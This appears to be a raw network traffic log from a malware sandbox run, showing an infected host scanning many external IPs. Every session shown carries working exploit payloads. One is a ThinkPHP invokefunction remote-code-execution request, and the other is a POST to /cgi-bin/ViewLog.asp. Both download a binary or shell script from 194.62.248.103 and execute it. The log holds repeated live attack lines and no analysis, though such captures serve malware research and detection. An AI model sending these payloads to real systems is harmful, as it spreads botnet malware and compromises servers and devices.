                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        511192.168.2.2333220112.133.231.20280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.838325024 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:16.289383888 CEST450INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 09:26:25 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.16
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        512192.168.2.2348170112.125.164.10880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.846198082 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:17.563026905 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:19.610646009 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:19.939511061 CEST188INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:16 GMT
                                                        Server: Apache
                                                        Content-Length: 11
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        513192.168.2.234658894.120.96.1898080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:16.428667068 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        514192.168.2.235268894.123.103.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:16.436177015 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        515192.168.2.235315285.241.97.368080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:16.747428894 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:17.713002920 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        516192.168.2.233642494.121.63.648080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:18.134681940 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        517192.168.2.233481085.122.223.1698080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:18.282092094 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        518192.168.2.236072831.136.90.2008080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:18.453588009 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:19.418679953 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:21.370378017 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:25.273833990 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:33.208980083 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:48.822504997 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:20.306231022 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        519192.168.2.235168262.29.13.1938080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:18.477036953 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        520192.168.2.235711095.164.248.6480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:18.556629896 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:18.853991985 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:22 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        521192.168.2.233512695.46.157.13280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:18.587451935 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:18.914921999 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:18 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        522192.168.2.234416695.115.37.14880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:18.587728024 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:18.915100098 CEST49INHTTP/1.1 404 Site or Page Not Found
                                                        Apr 14, 2024 16:36:18.915651083 CEST306INData Raw: 53 65 72 76 65 72 3a 20 44 56 52 44 56 53 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 53 75 6e 20 41 70 72 20 31 34 20 31 35 3a 33 36 3a 31 37 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72
                                                        Data Ascii: Server: DVRDVS-WebsDate: Sun Apr 14 15:36:17 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/html<html><head><title>Document Error: Site or Page Not Found</title></head><body><h2>Access Error: Site or Page Not Fou


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        523192.168.2.235221695.101.156.15380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:18.598063946 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:18.935902119 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:18 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:18 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 66 35 65 38 63 34 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 37 38 26 23 34 36 3b 33 30 37 64 38 32 30 62 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 32 66 35 65 38 63 34 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 37 38 26 23 34 36 3b 33 30 37 64 38 32 30 62 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2f5e8c4f&#46;1713105378&#46;307d820b<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;2f5e8c4f&#46;1713105378&#46;307d820b</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        524192.168.2.2357626112.74.55.22580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:18.935095072 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:19.268801928 CEST321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.20.1
                                                        Date: Sun, 14 Apr 2024 14:36:19 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        525192.168.2.234203231.173.246.268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:18.997246981 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:19.761042118 CEST88INHTTP/1.1 404 Not Found
                                                        Connection: Keep-Alive
                                                        Transfer-Encoding: chunked


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        526192.168.2.234520831.136.214.1488080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:19.129582882 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:22.202179909 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
